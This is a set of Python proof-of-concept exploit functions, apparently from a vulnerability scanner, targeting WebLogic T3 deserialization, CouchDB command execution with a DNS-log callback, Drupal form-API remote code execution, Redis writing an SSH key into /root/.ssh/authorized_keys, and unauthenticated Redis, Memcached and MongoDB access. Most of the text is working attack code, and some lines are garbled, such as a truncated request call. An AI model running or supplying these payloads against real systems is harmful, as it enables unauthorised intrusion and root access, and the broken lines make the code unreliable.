def Poc(url): init_url = url result = {} result['success'] = False result['message'] = '' socket.setdefaulttimeout(15) if ':' in GetNetloc(url): dport = int(GetNetloc(url).split(':')[1]) else: dport = 7001 ip = DomainToIP(GetNetloc(url)) if ip == None: return result if ':' in ip: dip = ip.split(':')[0] else: dip = ip try: index = 0 PAYLOAD = ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_addr = (dip, dport) t3handshake(sock, server_addr) buildT3RequestObject(sock, dport) rs = sendEvilObjData(sock, PAYLOAD[index]) if checkVul(rs,index): result['success'] = True return result except Exception,e: raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url): init_url = url result = {} result['success'] = False result['message'] = '' try: if ':' in GetNetloc(url): port = GetNetloc(url).split(':')[1] else: port = '5984' ip = DomainToIP(GetNetloc(url)) if ip == None: return result if ':' in ip: ip = ip.split(':')[0] url = GetNetloc(ip + ':' + port, True) version = GetVersion(url) AddUser(url) rangom_string = RandomString() command = '"ping -n 2 %s"' % (rangom_string + '.' + conf.CEYE_DOMAIN) CmeExec(url, command, version) data = CheckDnsLog(rangom_string) if data != False: result['success'] = True result['message'] = 'remote_addr:' + data[0][ 'remote_addr'] + ' name: ' + data[0]['name'] return result except Exception, e: raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url): init_url = url result = {} result['success'] = False result['message'] = '' try: socket.setdefaulttimeout(3) url = GetNetloc(url) ip = DomainToIP(url) if ip == None: return result payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' port = int(ip.split(':')[-1]) if ':' in ip else 6379 ip = DelPort(ip) s = socket.socket() s.connect((ip, port)) s.send(payload) recvdata = s.recv(1024) s.close() if recvdata and 'redis_version' in recvdata: result['success'] = True return result except Exception, e: raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url): init_url = url result = {} result['success'] = False result['message'] = '' try: socket.setdefaulttimeout(3) url = GetNetloc(url) ip = DomainToIP(url) if ip == None: return result port = int(ip.split(':')[-1]) if ':' in ip else 11211 ip = DelPort(ip) payload = '\x73\x74\x61\x74\x73\x0a' s = socket.socket() s.connect((ip, port)) s.send(payload) recvdata = s.recv(2048) s.close() if recvdata and 'STAT version' in recvdata: result['success'] = True result['message'] = 'version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata)) return result except Exception,e: raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url): init_url = url socket.setdefaulttimeout(5) result = {} result['success'] = False result['message'] = '' try: random_str = RandomString() url = GetNetloc(url, True) target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' payload = { 'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ' + random_str + ' | tee ' + random_str + '.txt' } r =, data=payload, timeout=5) if r.status_code != 200: return result else: r = requests.get(url + '/' + random_str + '.txt', timeout=5) if r.status_code == 200 and random_str == r.text.strip(): result['success'] = True result['message'] = 'random_file: /' + random_str + '.txt' return result except Exception, e: raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url): init_url = url public_key = '1' if public_key == '': raise PocErrorException( 'Poc:redis_sshkey_getshell Public_key is none! please input public_key.' ) result = {} result['success'] = False result['message'] = '' try: url = GetNetloc(url) url = DomainToIP(url) ip = url.split(':')[0] port = int(url.split(':')[-1]) if ':' in url else 6379 if not CheckPort(ip, 22): return result r = redis.Redis(host=ip, port=port, db=0, socket_timeout=2, socket_connect_timeout=2) if 'redis_version' in key = RandomString(10) r.set(key, '\n\n' + public_key + '\n\n') r.config_set('dir', '/root/.ssh') r.config_set('dbfilename', 'authorized_keys') r.delete(key) r.config_set('dir', '/tmp') time.sleep(5) if testConnect(ip, 22): result['success'] = True return result return result except Exception, e: raise PocWarningException(init_url, Info()['name'], repr(e))
def GetRealURL(self): while True: if self.raw_queue.qsize() <= 0 and self.is_run == False: break try: each = self.raw_queue.get(timeout=1) req = requests.get(each, timeout=3) domain = GetNetloc(req.url, True) self.lock.acquire() if domain not in self.domain_list: self.result_list.append(req.url) self.domain_list.append(domain) self.OutPutStatus(str(len(self.result_list)), str(self.raw_queue.qsize())) self.lock.release() except Exception, e: pass
def Poc(url): init_url = url result = {} result['success'] = False result['message'] = '' try: url = GetNetloc(url) ip = DomainToIP(url) if ip == None: return result port = int(ip.split(':')[-1]) if ':' in ip else 27017 ip = DelPort(ip) MONGO_URI = 'mongodb://'+ip+':'+str(port)+'/' conn = pymongo.MongoClient(MONGO_URI, serverSelectionTimeoutMS=3000) dbs = conn.database_names() result['success'] = True result['message'] = str(dbs) return result except Exception,e: raise PocWarningException(init_url,Info()['name'],repr(e))
def Poc(url): init_url = url result = {} try: data = '' url = GetNetloc(url, True) if CheckTargetAccess(url): files = LoadDict(dict_path) for file in files: try: file = file.strip() res = requests.get(url[0:-1] + file, timeout=3) except: continue if str(res.status_code).startswith('2'): data = data + '\n' + file + ': ' + str(res.status_code) if data: result['weak_file'] = data return result except Exception, e: raise PocWarningException(init_url, Info()['name'], repr(e))